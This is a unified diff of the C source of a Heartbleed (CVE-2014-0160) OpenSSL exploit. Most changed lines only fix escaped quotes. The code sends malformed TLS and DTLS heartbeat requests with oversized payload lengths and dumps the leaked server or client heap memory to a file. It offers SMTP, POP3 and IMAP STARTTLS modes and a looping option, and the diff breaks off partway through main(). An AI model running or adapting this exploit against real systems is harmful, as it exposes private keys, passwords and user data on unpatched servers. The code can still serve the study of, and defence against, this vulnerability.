* 000003a0 df a8 54 0e 4f 37 d0 a5 27 a3 f3 a7 28 38 3f 16 |..T.O7..\\\'...(8?.|
|
||||
* 000003a0 df a8 54 0e 4f 37 d0 a5 27 a3 f3 a7 28 38 3f 16 |..T.O7..'...(8?.|
|
||||
* 000003b0 fe ff 00 00 00 00 00 00 00 02 00 0c 0e 00 00 00 |................|
|
||||
* 000003c0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
|
||||
* 000003d0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
|
||||
|
@ -214,9 +214,9 @@
|
|||
#include <openssl/rand.h>
|
||||
#include <openssl/buffer.h>
|
||||
|
||||
#define n2s(c,s)((s=(((unsigned int)(c[0]))<< 8)| \\\\
|
||||
#define n2s(c,s)((s=(((unsigned int)(c[0]))<< 8)| \
|
||||
(((unsigned int)(c[1])) )),c+=2)
|
||||
#define s2n(s,c) ((c[0]=(unsigned char)(((s)>> 8)&0xff), \\\\
|
||||
#define s2n(s,c) ((c[0]=(unsigned char)(((s)>> 8)&0xff), \
|
||||
c[1]=(unsigned char)(((s) )&0xff)),c+=2)
|
||||
|
||||
int first = 0;
|
||||
|
@ -261,20 +261,20 @@ int tcp_connect(char* server,int port){
|
|||
host = gethostbyname(server);
|
||||
sd = socket(AF_INET, SOCK_STREAM, 0);
|
||||
if(sd==-1){
|
||||
printf(\\\"[!] cannot create socket\\\\n\\\");
|
||||
printf("[!] cannot create socket\n");
|
||||
exit(0);
|
||||
}
|
||||
sa.sin_family = AF_INET;
|
||||
sa.sin_port = htons(port);
|
||||
sa.sin_addr = *((struct in_addr *) host->h_addr);
|
||||
bzero(&(sa.sin_zero),8);
|
||||
printf(\\\"[ connecting to %s %d/tcp\\\\n\\\",server,port);
|
||||
printf("[ connecting to %s %d/tcp\n",server,port);
|
||||
ret = connect(sd,(struct sockaddr *)&sa, sizeof(struct sockaddr));
|
||||
if(ret==0){
|
||||
printf(\\\"[ connected to %s %d/tcp\\\\n\\\",server,port);
|
||||
printf("[ connected to %s %d/tcp\n",server,port);
|
||||
}
|
||||
else{
|
||||
printf(\\\"[!] FATAL: could not connect to %s %d/tcp\\\\n\\\",server,port);
|
||||
printf("[!] FATAL: could not connect to %s %d/tcp\n",server,port);
|
||||
exit(0);
|
||||
}
|
||||
return sd;
|
||||
|
@ -287,7 +287,7 @@ int tcp_bind(char* server, int port){
|
|||
host = gethostbyname(server);
|
||||
sd=socket(AF_INET,SOCK_STREAM,0);
|
||||
if(sd==-1){
|
||||
printf(\\\"[!] cannot create socket\\\\n\\\");
|
||||
printf("[!] cannot create socket\n");
|
||||
exit(0);
|
||||
}
|
||||
memset(&sin,0,sizeof(sin));
|
||||
|
@ -297,7 +297,7 @@ int tcp_bind(char* server, int port){
|
|||
setsockopt(sd,SOL_SOCKET,SO_REUSEADDR,&val,sizeof(val));
|
||||
ret = bind(sd,(struct sockaddr *)&sin,sizeof(sin));
|
||||
if(ret==-1){
|
||||
printf(\\\"[!] cannot bind socket\\\\n\\\");
|
||||
printf("[!] cannot bind socket\n");
|
||||
exit(0);
|
||||
}
|
||||
listen(sd,5);
|
||||
|
@ -314,35 +314,35 @@ connection* dtls_server(int sd, char* server,int port){
|
|||
struct sockaddr_in sa;
|
||||
unsigned long addr;
|
||||
if ((host = gethostbyname(server)) == NULL) {
|
||||
perror(\\\"gethostbyname\\\");
|
||||
perror("gethostbyname");
|
||||
exit(1);
|
||||
}
|
||||
sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
|
||||
if(sd==-1){
|
||||
printf(\\\"[!] cannot create socket\\\\n\\\");
|
||||
printf("[!] cannot create socket\n");
|
||||
exit(0);
|
||||
}
|
||||
sa.sin_family = AF_INET;
|
||||
sa.sin_port = htons(port);
|
||||
sa.sin_addr = *((struct in_addr *) host->h_addr);
|
||||
if (bind(sd, (struct sockaddr *) &sa ,sizeof(struct sockaddr_in)) < 0) {
|
||||
perror(\\\"bind()\\\");
|
||||
perror("bind()");
|
||||
exit(1);
|
||||
}
|
||||
|
||||
BIO *bio;
|
||||
if(c==NULL){
|
||||
printf(\\\"[ error in malloc()\\\\n\\\");
|
||||
printf("[ error in malloc()\n");
|
||||
exit(0);
|
||||
}
|
||||
if(buf==NULL){
|
||||
printf(\\\"[ error in malloc()\\\\n\\\");
|
||||
printf("[ error in malloc()\n");
|
||||
exit(0);
|
||||
}
|
||||
memset(buf,0,4096);
|
||||
c = malloc(sizeof(connection));
|
||||
if(c==NULL){
|
||||
printf(\\\"[ error in malloc()\\\\n\\\");
|
||||
printf("[ error in malloc()\n");
|
||||
exit(0);
|
||||
}
|
||||
c->socket = sd;
|
||||
|
@ -353,10 +353,10 @@ connection* dtls_server(int sd, char* server,int port){
|
|||
if(c->sslContext==NULL)
|
||||
ERR_print_errors_fp(stderr);
|
||||
SSL_CTX_SRP_CTX_init(c->sslContext);
|
||||
SSL_CTX_use_certificate_file(c->sslContext, \\\"./server.crt\\\", SSL_FILETYPE_PEM);
|
||||
SSL_CTX_use_PrivateKey_file(c->sslContext, \\\"./server.key\\\", SSL_FILETYPE_PEM);
|
||||
SSL_CTX_use_certificate_file(c->sslContext, "./server.crt", SSL_FILETYPE_PEM);
|
||||
SSL_CTX_use_PrivateKey_file(c->sslContext, "./server.key", SSL_FILETYPE_PEM);
|
||||
if(!SSL_CTX_check_private_key(c->sslContext)){
|
||||
printf(\\\"[!] FATAL: private key does not match the certificate public key\\\\n\\\");
|
||||
printf("[!] FATAL: private key does not match the certificate public key\n");
|
||||
exit(0);
|
||||
}
|
||||
c->sslHandle = SSL_new(c->sslContext);
|
||||
|
@ -370,12 +370,12 @@ connection* dtls_server(int sd, char* server,int port){
|
|||
SSL_set_accept_state (c->sslHandle);
|
||||
|
||||
int rc = SSL_accept(c->sslHandle);
|
||||
printf (\\\"[ SSL connection using %s\\\\n\\\", SSL_get_cipher (c->sslHandle));
|
||||
printf ("[ SSL connection using %s\n", SSL_get_cipher (c->sslHandle));
|
||||
// bytes = SSL_read(c->sslHandle, buf, 4095);
|
||||
// printf(\\\"[ recieved: %d bytes - showing output\\\\n%s\\\\n[\\\\n\\\",bytes,buf);
|
||||
// printf("[ recieved: %d bytes - showing output\n%s\n[\n",bytes,buf);
|
||||
if(!c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_ENABLED ||
|
||||
c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_DONT_SEND_REQUESTS){
|
||||
printf(\\\"[ warning: heartbeat extension is unsupported (try anyway)\\\\n\\\");
|
||||
printf("[ warning: heartbeat extension is unsupported (try anyway)\n");
|
||||
}
|
||||
return c;
|
||||
}
|
||||
|
@ -392,7 +392,7 @@ connection* tls_connect(int sd){
|
|||
connection *c;
|
||||
c = malloc(sizeof(connection));
|
||||
if(c==NULL){
|
||||
printf(\\\"[ error in malloc()\\\\n\\\");
|
||||
printf("[ error in malloc()\n");
|
||||
exit(0);
|
||||
}
|
||||
c->socket = sd;
|
||||
|
@ -411,7 +411,7 @@ connection* tls_connect(int sd){
|
|||
ERR_print_errors_fp(stderr);
|
||||
if(!c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_ENABLED ||
|
||||
c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_DONT_SEND_REQUESTS){
|
||||
printf(\\\"[ warning: heartbeat extension is unsupported (try anyway)\\\\n\\\");
|
||||
printf("[ warning: heartbeat extension is unsupported (try anyway)\n");
|
||||
}
|
||||
return c;
|
||||
}
|
||||
|
@ -424,25 +424,25 @@ connection* dtls_client(int sd, char* server,int port){
|
|||
memset((char *)&sa,0,sizeof(sa));
|
||||
c = malloc(sizeof(connection));
|
||||
if ((host = gethostbyname(server)) == NULL) {
|
||||
perror(\\\"gethostbyname\\\");
|
||||
perror("gethostbyname");
|
||||
exit(1);
|
||||
}
|
||||
sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
|
||||
if(sd==-1){
|
||||
printf(\\\"[!] cannot create socket\\\\n\\\");
|
||||
printf("[!] cannot create socket\n");
|
||||
exit(0);
|
||||
}
|
||||
sa.sin_family = AF_INET;
|
||||
sa.sin_port = htons(port);
|
||||
sa.sin_addr = *((struct in_addr *) host->h_addr);
|
||||
if (connect(sd, (struct sockaddr *) &sa ,sizeof(struct sockaddr_in)) < 0) {
|
||||
perror(\\\"connect()\\\");
|
||||
perror("connect()");
|
||||
exit(0);
|
||||
}
|
||||
|
||||
BIO *bio;
|
||||
if(c==NULL){
|
||||
printf(\\\"[ error in malloc()\\\\n\\\");
|
||||
printf("[ error in malloc()\n");
|
||||
exit(0);
|
||||
}
|
||||
|
||||
|
@ -463,13 +463,13 @@ connection* dtls_client(int sd, char* server,int port){
|
|||
BIO_ctrl_set_connected(bio, 1, &sa);
|
||||
SSL_set_bio(c->sslHandle, bio, bio);
|
||||
SSL_set_connect_state (c->sslHandle);
|
||||
//printf(\\\"eshta\\\\n\\\");
|
||||
//printf("eshta\n");
|
||||
if(SSL_connect(c->sslHandle)!=1)
|
||||
ERR_print_errors_fp(stderr);
|
||||
|
||||
if(!c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_ENABLED ||
|
||||
c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_DONT_SEND_REQUESTS){
|
||||
printf(\\\"[ warning: heartbeat extension is unsupported (try anyway), %d \\\\n\\\",c->sslHandle->tlsext_heartbeat);
|
||||
printf("[ warning: heartbeat extension is unsupported (try anyway), %d \n",c->sslHandle->tlsext_heartbeat);
|
||||
}
|
||||
return c;
|
||||
}
|
||||
|
@ -480,13 +480,13 @@ connection* tls_bind(int sd){
|
|||
char* buf;
|
||||
buf = malloc(4096);
|
||||
if(buf==NULL){
|
||||
printf(\\\"[ error in malloc()\\\\n\\\");
|
||||
printf("[ error in malloc()\n");
|
||||
exit(0);
|
||||
}
|
||||
memset(buf,0,4096);
|
||||
c = malloc(sizeof(connection));
|
||||
if(c==NULL){
|
||||
printf(\\\"[ error in malloc()\\\\n\\\");
|
||||
printf("[ error in malloc()\n");
|
||||
exit(0);
|
||||
}
|
||||
c->socket = sd;
|
||||
|
@ -497,10 +497,10 @@ connection* tls_bind(int sd){
|
|||
ERR_print_errors_fp(stderr);
|
||||
SSL_CTX_set_options(c->sslContext, SSL_OP_ALL | SSL_OP_NO_SSLv2 | SSL_OP_NO_SSLv3);
|
||||
SSL_CTX_SRP_CTX_init(c->sslContext);
|
||||
SSL_CTX_use_certificate_file(c->sslContext, \\\"./server.crt\\\", SSL_FILETYPE_PEM);
|
||||
SSL_CTX_use_PrivateKey_file(c->sslContext, \\\"./server.key\\\", SSL_FILETYPE_PEM);
|
||||
SSL_CTX_use_certificate_file(c->sslContext, "./server.crt", SSL_FILETYPE_PEM);
|
||||
SSL_CTX_use_PrivateKey_file(c->sslContext, "./server.key", SSL_FILETYPE_PEM);
|
||||
if(!SSL_CTX_check_private_key(c->sslContext)){
|
||||
printf(\\\"[!] FATAL: private key does not match the certificate public key\\\\n\\\");
|
||||
printf("[!] FATAL: private key does not match the certificate public key\n");
|
||||
exit(0);
|
||||
}
|
||||
c->sslHandle = SSL_new(c->sslContext);
|
||||
|
@ -509,12 +509,12 @@ connection* tls_bind(int sd){
|
|||
if(!SSL_set_fd(c->sslHandle,c->socket))
|
||||
ERR_print_errors_fp(stderr);
|
||||
int rc = SSL_accept(c->sslHandle);
|
||||
printf (\\\"[ SSL connection using %s\\\\n\\\", SSL_get_cipher (c->sslHandle));
|
||||
printf ("[ SSL connection using %s\n", SSL_get_cipher (c->sslHandle));
|
||||
bytes = SSL_read(c->sslHandle, buf, 4095);
|
||||
printf(\\\"[ recieved: %d bytes - showing output\\\\n%s\\\\n[\\\\n\\\",bytes,buf);
|
||||
printf("[ recieved: %d bytes - showing output\n%s\n[\n",bytes,buf);
|
||||
if(!c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_ENABLED ||
|
||||
c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_DONT_SEND_REQUESTS){
|
||||
printf(\\\"[ warning: heartbeat extension is unsupported (try anyway)\\\\n\\\");
|
||||
printf("[ warning: heartbeat extension is unsupported (try anyway)\n");
|
||||
}
|
||||
return c;
|
||||
}
|
||||
|
@ -528,16 +528,16 @@ int pre_cmd(int sd,int precmd,int verbose){
|
|||
char* line2;
|
||||
switch(precmd){
|
||||
case 0:
|
||||
line1 = \\\"EHLO test\\\\n\\\";
|
||||
line2 = \\\"STARTTLS\\\\n\\\";
|
||||
line1 = "EHLO test\n";
|
||||
line2 = "STARTTLS\n";
|
||||
break;
|
||||
case 1:
|
||||
line1 = \\\"CAPA\\\\n\\\";
|
||||
line2 = \\\"STLS\\\\n\\\";
|
||||
line1 = "CAPA\n";
|
||||
line2 = "STLS\n";
|
||||
break;
|
||||
case 2:
|
||||
line1 = \\\"a001 CAPB\\\\n\\\";
|
||||
line2 = \\\"a002 STARTTLS\\\\n\\\";
|
||||
line1 = "a001 CAPB\n";
|
||||
line2 = "a002 STARTTLS\n";
|
||||
break;
|
||||
default:
|
||||
go = 1;
|
||||
|
@ -546,23 +546,23 @@ int pre_cmd(int sd,int precmd,int verbose){
|
|||
if(go==0){
|
||||
buffer = malloc(2049);
|
||||
if(buffer==NULL){
|
||||
printf(\\\"[ error in malloc()\\\\n\\\");
|
||||
printf("[ error in malloc()\n");
|
||||
exit(0);
|
||||
}
|
||||
memset(buffer,0,2049);
|
||||
rc = read(sd,buffer,2048);
|
||||
printf(\\\"[ banner: %s\\\",buffer);
|
||||
printf("[ banner: %s",buffer);
|
||||
send(sd,line1,strlen(line1),0);
|
||||
memset(buffer,0,2049);
|
||||
rc = read(sd,buffer,2048);
|
||||
if(verbose==1){
|
||||
printf(\\\"%s\\\\n\\\",buffer);
|
||||
printf("%s\n",buffer);
|
||||
}
|
||||
send(sd,line2,strlen(line2),0);
|
||||
memset(buffer,0,2049);
|
||||
rc = read(sd,buffer,2048);
|
||||
if(verbose==1){
|
||||
printf(\\\"%s\\\\n\\\",buffer);
|
||||
printf("%s\n",buffer);
|
||||
}
|
||||
}
|
||||
return sd;
|
||||
|
@ -573,7 +573,7 @@ void* heartbleed(connection *c,unsigned int type){
|
|||
int ret;
|
||||
buf = OPENSSL_malloc(1 + 2);
|
||||
if(buf==NULL){
|
||||
printf(\\\"[ error in malloc()\\\\n\\\");
|
||||
printf("[ error in malloc()\n");
|
||||
exit(0);
|
||||
}
|
||||
p = buf;
|
||||
|
@ -586,11 +586,11 @@ void* heartbleed(connection *c,unsigned int type){
|
|||
s2n(0xffff,p);
|
||||
break;
|
||||
default:
|
||||
printf(\\\"[ setting heartbeat payload_length to %u\\\\n\\\",type);
|
||||
printf("[ setting heartbeat payload_length to %u\n",type);
|
||||
s2n(type,p);
|
||||
break;
|
||||
}
|
||||
printf(\\\"[ <3 <3 <3 heart bleed <3 <3 <3\\\\n\\\");
|
||||
printf("[ <3 <3 <3 heart bleed <3 <3 <3\n");
|
||||
ret = ssl3_write_bytes(c->sslHandle, TLS1_RT_HEARTBEAT, buf, 3);
|
||||
OPENSSL_free(buf);
|
||||
return c;
|
||||
|
@ -601,9 +601,9 @@ void* dtlsheartbleed(connection *c,unsigned int type){
|
|||
unsigned char *buf, *p;
|
||||
int ret;
|
||||
buf = OPENSSL_malloc(1 + 2 + 16);
|
||||
memset(buf, \\\'\\\\0\\\', sizeof buf);
|
||||
memset(buf, '\0', sizeof buf);
|
||||
if(buf==NULL){
|
||||
printf(\\\"[ error in malloc()\\\\n\\\");
|
||||
printf("[ error in malloc()\n");
|
||||
exit(0);
|
||||
}
|
||||
p = buf;
|
||||
|
@ -618,12 +618,12 @@ void* dtlsheartbleed(connection *c,unsigned int type){
|
|||
s2n(0x0538,p);
|
||||
break;
|
||||
default:
|
||||
printf(\\\"[ setting heartbeat payload_length to %u\\\\n\\\",type);
|
||||
printf("[ setting heartbeat payload_length to %u\n",type);
|
||||
s2n(type,p);
|
||||
break;
|
||||
}
|
||||
s2n(c->sslHandle->tlsext_hb_seq, p);
|
||||
printf(\\\"[ <3 <3 <3 heart bleed <3 <3 <3\\\\n\\\");
|
||||
printf("[ <3 <3 <3 heart bleed <3 <3 <3\n");
|
||||
|
||||
ret = dtls1_write_bytes(c->sslHandle, TLS1_RT_HEARTBEAT, buf, 3 + 16);
|
||||
|
||||
|
@ -674,18 +674,18 @@ void* sneakyleaky(connection *c,char* filename, int verbose){
|
|||
version=(ssl_major<<8)|ssl_minor;
|
||||
n2s(p,rr->length);
|
||||
if(rr->type==24){
|
||||
printf(\\\"[ heartbeat returned type=%d length=%u\\\\n\\\",rr->type, rr->length);
|
||||
printf("[ heartbeat returned type=%d length=%u\n",rr->type, rr->length);
|
||||
if(rr->length > 16834){
|
||||
printf(\\\"[ error: got a malformed TLS length.\\\\n\\\");
|
||||
printf("[ error: got a malformed TLS length.\n");
|
||||
exit(0);
|
||||
}
|
||||
}
|
||||
else{
|
||||
printf(\\\"[ incorrect record type=%d length=%u returned\\\\n\\\",rr->type,rr->length);
|
||||
printf("[ incorrect record type=%d length=%u returned\n",rr->type,rr->length);
|
||||
s->packet_length=0;
|
||||
badpackets++;
|
||||
if(badpackets > 3){
|
||||
printf(\\\"[ error: too many bad packets recieved\\\\n\\\");
|
||||
printf("[ error: too many bad packets recieved\n");
|
||||
exit(0);
|
||||
}
|
||||
goto apple;
|
||||
|
@ -696,7 +696,7 @@ void* sneakyleaky(connection *c,char* filename, int verbose){
|
|||
n=ssl3_read_n(s,i,i,1);
|
||||
if (n <= 0) goto apple;
|
||||
}
|
||||
printf(\\\"[ decrypting SSL packet\\\\n\\\");
|
||||
printf("[ decrypting SSL packet\n");
|
||||
s->rstate=SSL_ST_READ_HEADER;
|
||||
rr->input= &(s->packet[SSL3_RT_HEADER_LENGTH]);
|
||||
rr->data=rr->input;
|
||||
|
@ -763,11 +763,11 @@ void* sneakyleaky(connection *c,char* filename, int verbose){
|
|||
heartbleed_len = (heartbleed_len & 0xff) << 8 | (heartbleed_len & 0xff00) >> 8;
|
||||
first = 2;
|
||||
leakbytes = heartbleed_len + 16;
|
||||
printf(\\\"[ heartbleed leaked length=%u\\\\n\\\",heartbleed_len);
|
||||
printf("[ heartbleed leaked length=%u\n",heartbleed_len);
|
||||
}
|
||||
if(verbose==1){
|
||||
{ unsigned int z; for (z=0; z<rr->length; z++) printf(\\\"%02X%c\\\",rr->data[z],((z+1)%16)?\\\' \\\':\\\'\\\\n\\\'); }
|
||||
printf(\\\"\\\\n\\\");
|
||||
{ unsigned int z; for (z=0; z<rr->length; z++) printf("%02X%c",rr->data[z],((z+1)%16)?' ':'\n'); }
|
||||
printf("\n");
|
||||
}
|
||||
leakbytes-=rr->length;
|
||||
if(leakbytes > 0){
|
||||
|
@ -776,7 +776,7 @@ void* sneakyleaky(connection *c,char* filename, int verbose){
|
|||
else{
|
||||
repeat = 0;
|
||||
}
|
||||
printf(\\\"[ final record type=%d, length=%u\\\\n\\\", rr->type, rr->length);
|
||||
printf("[ final record type=%d, length=%u\n", rr->type, rr->length);
|
||||
int output = s->s3->rrec.length-3;
|
||||
if(output > 0){
|
||||
int fd = open(filename,O_RDWR|O_CREAT|O_APPEND,0700);
|
||||
|
@ -784,24 +784,24 @@ void* sneakyleaky(connection *c,char* filename, int verbose){
|
|||
first--;
|
||||
write(fd,s->s3->rrec.data+3,s->s3->rrec.length);
|
||||
/* first three bytes are resp+len */
|
||||
printf(\\\"[ wrote %d bytes of heap to file \\\'%s\\\'\\\\n\\\",s->s3->rrec.length-3,filename);
|
||||
printf("[ wrote %d bytes of heap to file '%s'\n",s->s3->rrec.length-3,filename);
|
||||
}
|
||||
else{
|
||||
/* heap data & 16 bytes padding */
|
||||
write(fd,s->s3->rrec.data+3,s->s3->rrec.length);
|
||||
printf(\\\"[ wrote %d bytes of heap to file \\\'%s\\\'\\\\n\\\",s->s3->rrec.length,filename);
|
||||
printf("[ wrote %d bytes of heap to file '%s'\n",s->s3->rrec.length,filename);
|
||||
}
|
||||
close(fd);
|
||||
}
|
||||
else{
|
||||
printf(\\\"[ nothing from the heap to write\\\\n\\\");
|
||||
printf("[ nothing from the heap to write\n");
|
||||
}
|
||||
return;
|
||||
apple:
|
||||
printf(\\\"[ problem handling SSL record packet - wrong type?\\\\n\\\");
|
||||
printf("[ problem handling SSL record packet - wrong type?\n");
|
||||
badpackets++;
|
||||
if(badpackets > 3){
|
||||
printf(\\\"[ error: too many bad packets recieved\\\\n\\\");
|
||||
printf("[ error: too many bad packets recieved\n");
|
||||
exit(0);
|
||||
}
|
||||
return;
|
||||
|
@ -843,18 +843,18 @@ again:
|
|||
p+=6;
|
||||
n2s(p,rr->length);
|
||||
if(rr->type==24){
|
||||
printf(\\\"[ heartbeat returned type=%d length=%u\\\\n\\\",rr->type, rr->length);
|
||||
printf("[ heartbeat returned type=%d length=%u\n",rr->type, rr->length);
|
||||
if(rr->length > 16834){
|
||||
printf(\\\"[ error: got a malformed TLS length.\\\\n\\\");
|
||||
printf("[ error: got a malformed TLS length.\n");
|
||||
exit(0);
|
||||
}
|
||||
}
|
||||
else{
|
||||
printf(\\\"[ incorrect record type=%d length=%u returned\\\\n\\\",rr->type,rr->length);
|
||||
printf("[ incorrect record type=%d length=%u returned\n",rr->type,rr->length);
|
||||
s->packet_length=0;
|
||||
badpackets++;
|
||||
if(badpackets > 3){
|
||||
printf(\\\"[ error: too many bad packets recieved\\\\n\\\");
|
||||
printf("[ error: too many bad packets recieved\n");
|
||||
exit(0);
|
||||
}
|
||||
goto apple;
|
||||
|
@ -872,7 +872,7 @@ again:
|
|||
s->packet_length = 0;
|
||||
goto again;
|
||||
}
|
||||
printf(\\\"[ decrypting SSL packet\\\\n\\\");
|
||||
printf("[ decrypting SSL packet\n");
|
||||
s->rstate=SSL_ST_READ_HEADER;
|
||||
|
||||
bitmap = dtls1_get_bitmap(s, rr, &is_next_epoch);
|
||||
|
@ -977,11 +977,11 @@ if (is_next_epoch)
|
|||
heartbleed_len = (heartbleed_len & 0xff) << 8 | (heartbleed_len & 0xff00) >> 8;
|
||||
first = 2;
|
||||
leakbytes = heartbleed_len + 16;
|
||||
printf(\\\"[ heartbleed leaked length=%u\\\\n\\\",heartbleed_len);
|
||||
printf("[ heartbleed leaked length=%u\n",heartbleed_len);
|
||||
}
|
||||
if(verbose==1){
|
||||
{ unsigned int z; for (z=0; z<rr->length; z++) printf(\\\"%02X%c\\\",rr->data[z],((z+1)%16)?\\\' \\\':\\\'\\\\n\\\'); }
|
||||
printf(\\\"\\\\n\\\");
|
||||
{ unsigned int z; for (z=0; z<rr->length; z++) printf("%02X%c",rr->data[z],((z+1)%16)?' ':'\n'); }
|
||||
printf("\n");
|
||||
}
|
||||
leakbytes-=rr->length;
|
||||
if(leakbytes > 0){
|
||||
|
@ -990,7 +990,7 @@ if (is_next_epoch)
|
|||
else{
|
||||
repeat = 0;
|
||||
}
|
||||
printf(\\\"[ final record type=%d, length=%u\\\\n\\\", rr->type, rr->length);
|
||||
printf("[ final record type=%d, length=%u\n", rr->type, rr->length);
|
||||
int output = s->s3->rrec.length-3;
|
||||
if(output > 0){
|
||||
int fd = open(filename,O_RDWR|O_CREAT|O_APPEND,0700);
|
||||
|
@ -998,17 +998,17 @@ if (is_next_epoch)
|
|||
first--;
|
||||
write(fd,s->s3->rrec.data+3,s->s3->rrec.length);
|
||||
/* first three bytes are resp+len */
|
||||
printf(\\\"[ wrote %d bytes of heap to file \\\'%s\\\'\\\\n\\\",s->s3->rrec.length-3,filename);
|
||||
printf("[ wrote %d bytes of heap to file '%s'\n",s->s3->rrec.length-3,filename);
|
||||
}
|
||||
else{
|
||||
/* heap data & 16 bytes padding */
|
||||
write(fd,s->s3->rrec.data+3,s->s3->rrec.length);
|
||||
printf(\\\"[ wrote %d bytes of heap to file \\\'%s\\\'\\\\n\\\",s->s3->rrec.length,filename);
|
||||
printf("[ wrote %d bytes of heap to file '%s'\n",s->s3->rrec.length,filename);
|
||||
}
|
||||
close(fd);
|
||||
}
|
||||
else{
|
||||
printf(\\\"[ nothing from the heap to write\\\\n\\\");
|
||||
printf("[ nothing from the heap to write\n");
|
||||
}
|
||||
|
||||
dtls1_stop_timer(c->sslHandle);
|
||||
|
@ -1017,10 +1017,10 @@ if (is_next_epoch)
|
|||
|
||||
return;
|
||||
apple:
|
||||
printf(\\\"[ problem handling SSL record packet - wrong type?\\\\n\\\");
|
||||
printf("[ problem handling SSL record packet - wrong type?\n");
|
||||
badpackets++;
|
||||
if(badpackets > 3){
|
||||
printf(\\\"[ error: too many bad packets recieved\\\\n\\\");
|
||||
printf("[ error: too many bad packets recieved\n");
|
||||
exit(0);
|
||||
}
|
||||
return;
|
||||
|
@ -1192,25 +1192,25 @@ static void dtls1_record_bitmap_update(SSL *s, DTLS1_BITMAP *bitmap)
|
|||
|
||||
|
||||
void usage(){
|
||||
printf(\\\"[\\\\n\\\");
|
||||
printf(\\\"[ --server|-s <ip/dns> - the server to target\\\\n\\\");
|
||||
printf(\\\"[ --port|-p <port> - the port to target\\\\n\\\");
|
||||
printf(\\\"[ --file|-f <filename> - file to write data to\\\\n\\\");
|
||||
printf(\\\"[ --bind|-b <ip> - bind to ip for exploiting clients\\\\n\\\");
|
||||
printf(\\\"[ --precmd|-c <n> - send precmd buffer (STARTTLS)\\\\n\\\");
|
||||
printf(\\\"[ 0 = SMTP\\\\n\\\");
|
||||
printf(\\\"[ 1 = POP3\\\\n\\\");
|
||||
printf(\\\"[ 2 = IMAP\\\\n\\\");
|
||||
printf(\\\"[ --loop|-l - loop the exploit attempts\\\\n\\\");
|
||||
printf(\\\"[ --type|-t <n> - select exploit to try\\\\n\\\");
|
||||
printf(\\\"[ 0 = null length\\\\n\\\");
|
||||
printf(\\\"[ 1 = max leak\\\\n\\\");
|
||||
printf(\\\"[ n = heartbeat payload_length\\\\n\\\");
|
||||
printf(\\\"[ --udp|-u - use dtls/udp\\\\n\\\");
|
||||
printf(\\\"[\\\\n\\\");
|
||||
printf(\\\"[ --verbose|-v - output leak to screen\\\\n\\\");
|
||||
printf(\\\"[ --help|-h - this output\\\\n\\\");
|
||||
printf(\\\"[\\\\n\\\");
|
||||
printf("[\n");
|
||||
printf("[ --server|-s <ip/dns> - the server to target\n");
|
||||
printf("[ --port|-p <port> - the port to target\n");
|
||||
printf("[ --file|-f <filename> - file to write data to\n");
|
||||
printf("[ --bind|-b <ip> - bind to ip for exploiting clients\n");
|
||||
printf("[ --precmd|-c <n> - send precmd buffer (STARTTLS)\n");
|
||||
printf("[ 0 = SMTP\n");
|
||||
printf("[ 1 = POP3\n");
|
||||
printf("[ 2 = IMAP\n");
|
||||
printf("[ --loop|-l - loop the exploit attempts\n");
|
||||
printf("[ --type|-t <n> - select exploit to try\n");
|
||||
printf("[ 0 = null length\n");
|
||||
printf("[ 1 = max leak\n");
|
||||
printf("[ n = heartbeat payload_length\n");
|
||||
printf("[ --udp|-u - use dtls/udp\n");
|
||||
printf("[\n");
|
||||
printf("[ --verbose|-v - output leak to screen\n");
|
||||
printf("[ --help|-h - this output\n");
|
||||
printf("[\n");
|
||||
exit(0);
|
||||
}
|
||||
|
||||
|
@ -1222,92 +1222,92 @@ int main(int argc, char* argv[]){
|
|||
connection* c;
|
||||
char *host, *file;
|
||||
int ihost = 0, iport = 0, ifile = 0, itype = 0, iprecmd = 0;
|
||||
printf(\\\"[ heartbleed - CVE-2014-0160 - OpenSSL information leak exploit\\\\n\\\");
|
||||
printf(\\\"[ =============================================================\\\\n\\\");
|
||||
printf("[ heartbleed - CVE-2014-0160 - OpenSSL information leak exploit\n");
|
||||
printf("[ =============================================================\n");
|
||||
static struct option options[] = {
|
||||
{\\\"server\\\", 1, 0, \\\'s\\\'},
|
||||
{\\\"port\\\", 1, 0, \\\'p\\\'},
|
||||
{\\\"file\\\", 1, 0, \\\'f\\\'},
|
||||
{\\\"type\\\", 1, 0, \\\'t\\\'},
|
||||
{\\\"bind\\\", 1, 0, \\\'b\\\'},
|
||||
{\\\"verbose\\\", 0, 0, \\\'v\\\'},
|
||||
{\\\"precmd\\\", 1, 0, \\\'c\\\'},
|
||||
{\\\"loop\\\", 0, 0, \\\'l\\\'},
|
||||
{\\\"help\\\", 0, 0,\\\'h\\\'},
|
||||
{\\\"udp\\\", 0, 0, \\\'u\\\'}
|
||||
{"server", 1, 0, 's'},
|
||||
{"port", 1, 0, 'p'},
|
||||
{"file", 1, 0, 'f'},
|
||||
{"type", 1, 0, 't'},
|
||||
{"bind", 1, 0, 'b'},
|
||||
{"verbose", 0, 0, 'v'},
|
||||
{"precmd", 1, 0, 'c'},
|
||||
{"loop", 0, 0, 'l'},
|
||||
{"help", 0, 0,'h'},
|
||||
{"udp", 0, 0, 'u'}
|
||||
};
|
||||
while(userc != -1) {
|
||||
userc = getopt_long(argc,argv,\\\"s:p:f:t:b:c:lvhu\\\",options,&index);
|
||||
userc = getopt_long(argc,argv,"s:p:f:t:b:c:lvhu",options,&index);
|
||||
switch(userc) {
|
||||
case -1:
|
||||
break;
|
||||
case \\\'s\\\':
|
||||
case 's':
|
||||
if(ihost==0){
|
||||
ihost = 1;
|
||||
h = gethostbyname(optarg);
|
||||
if(h==NULL){
|
||||
printf(\\\"[!] FATAL: unknown host \\\'%s\\\'\\\\n\\\",optarg);
|
||||
printf("[!] FATAL: unknown host '%s'\n",optarg);
|
||||
exit(1);
|
||||
}
|
||||
host = malloc(strlen(optarg) + 1);
|
||||
if(host==NULL){
|
||||
printf(\\\"[ error in malloc()\\\\n\\\");
|
||||
printf("[ error in malloc()\n");
|
||||
exit(0);
|
||||
}
|
||||
